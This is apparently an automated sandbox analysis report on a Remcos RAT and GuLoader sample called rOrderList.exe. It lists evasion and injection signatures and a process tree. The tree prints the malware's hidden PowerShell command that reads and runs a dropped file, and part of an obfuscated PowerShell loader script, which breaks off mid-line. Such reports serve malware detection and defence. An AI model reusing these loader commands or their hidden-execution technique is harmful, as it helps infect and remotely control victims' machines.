Edit tour
Windows
Analysis Report
rOrderList.exe
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Sigma detected: Remcos
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard
Classification
- System is w10x64native
- rOrderList.exe (PID: 3280 cmdline:
C:\Users\u ser\Deskto p\rOrderLi st.exe MD5: 8FC2E883931E5B10652A053FD52C372A) - powershell.exe (PID: 4392 cmdline:
powershell .exe -wind owstyle hi dden $a = Get-Conten t 'C:\Use rs\user\Ap pData\Loca l\Interpar tesforhold \Strengele ge\Smalsid ernes\Euri ndic.zoo' ; powershe ll.exe "$a " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4264 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 400 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " <#Soldierp roof iscre mernes Vag thundes Ta ktmssigt E mbroaden S ecluded #> $Bisonerne = """ F;B aF juFon B cFetEsireo Scn T HWLy aBefOvfLoe Tad B8La U n{ V N S A l SvpAfaFa r laSwmBa( P[UdSsctF orCoi Pn A g S]Fo`$ U L RuTrvTja Mar Utsw) K;Ca Di`$B aUPenCrdBi eUnc NkBle Did N4 L C =Ba Ls`$Je LVeuAuv Ba SrAnt I.S aLBoeEnntn gGrtHjhAp; To S fr su U`$FrDApo MelTilVaaB lrMal Me u aHaf H Pl= No BaNHee Swtv- COSc bBrjUnevac UntJu Chb Hyaat SeQu [Ud] T R( L`$ HU Nnn od HeDecMi k LeFadYa4 Mo Ph/Se U n2Tr)Fn;Fo H Gr Un T FHaoEnrNi( B`$ RPAto LulPayInp Eh Ro MnKi i Ac sa Bl FilGnyRe=S k0Ak; B fr `$FaPWao R lIryDopElh Puo On Si Wc LaTelUl l Fy D R-K rlKltFr Ge `$EnULinId d JeLecEmk HveFodsa4L v; T Ch`$V ePSjoOmlGe yAlp AhSeo UfnUeiSccF la TlCalPa ypr+ R=Pi2 An) M{ F o r Ko O O R e C Pr F`$ SD Oo KlC al Sa PrHi l SeUdaGlf va[ E`$SuP LoOpl syT op Ph Eo M n uiSocSoa RalUdl mya u/ I2Be]Al Ma= H Ma[ Orc To rnI rvHoeBlr C tSp]be:Wa: BeT Go IBC oy PtFoe g (Pn`$DeLBi u Pv Ba fr PtAt. nS MuBibTys P t FrGli Bn AlgNu( T`$ TuPSooLglO pyTopAnhRu oHjneji Bc LaHalRalB iy F,Sy Ac 2In) D,Fu Dr1Co6He)R u;No R ga` $GeDCooAcl NlAta IrP rlReeFaa F f F[ I`$Go PBioRolUny DupLih AoK nnSti GcEr astlMul Ay E/Fy2 U]G y B=He Ma( S`$ MDUdo Skl TlPuaU dr Bl Re D a Cf O[Tu` $OmPUgoGll TyCopVohT oobrnBliMo cHaaSulBul QyEx/ B2 L]El Ph- S bFrx Foscr Al Sa1tr7 C2Ca)Ov; V mi Tu Ed I} O Ta[ M S Mt SrCoi Rn RgPr]A n[ cS SyBi sTatDueNim Tl. DTToeN oxAutUr. S EsenUdcsto MdVuiRanR ygsl] F: C :DoABeSAlC VIseIAp.P oGDee Ttbl S st Br Si Sn Sg A( D`$ BDAkoS al IlGeaFu rSulPrePoa TufRe)Ch;e k}Re`$IrDR erSti Mf S tCas Fh Be Prr PrFoe SnGe0Op=lu WsaaTof Lf Une PdFo8C l Ne' FFFo FAeDSt5ToD OFAmDBu8 JCVe9 eC S 1Ta8Fr2WhC Fr8CoCLo0 OCKr0tr' S ; M`$ScDCa rhaimafSkt Sjs Mh DeT erFrr PeSn n G1Ud= UW Hoa Df RfF oepsdRu8No C'HdE A1 HC u5StC S FUnD BE FC Au3 WDPlFC hC E3 BC P A TD W8 F8 S2 SFCaBM aC V5 SCMo 2Al9FaFBr9 CEUn8 S2U nFQu9 SC Q 2AfD AFBiC naDReCReAC aC J9FoEMe 2 BC ND TD S8 ICCi5S uDSeAPhCFa 9 MEDe1 DC ps9SaD A8 UCUn4PrC M 3kuC R8InD LiF A' N;A l`$ OD RrA rionf AtMj s Uh DeRer Sur GePon A2 H=ShWDa aDef FfEde WdSk8Ca D e' DE OBOm CCo9BrD P8 BiF GCKaD TEReCDo3 B CDrFStECoD LuCPe8 PCB u8 RDDiE M C S9SkDfrF KoD IF B'R e; B`$ fD SrMeiFlf B t Gs Uh Me SrSkr MeK inSa3 P=De WOva MfTof IeMid k8 B N'ApFNaF OmDGa5GeD RFFlDWa8 G CCo9HjCbe1 P8 i2ClFT iEkrD H9Do CMu2 RDSa8 CC e5FaCS l1 IC g9Mi 8Se2PhEAr5 SC E2AnDS p8IdCBi9Su DGuE LC K3 KaDLeCpaFK oF BCGu9 B DouE PDBvA boCNu5AcC UFScC H9In DNoF L8Sh2 UnESk4SvC SD PC P2 P CSy8SyCPo0 VCIt9 AF VE CCGa9 I CPaAOv'Ua; Du`$ BD fr afisnfKrtD esKrhAfe S rsvrsoeMan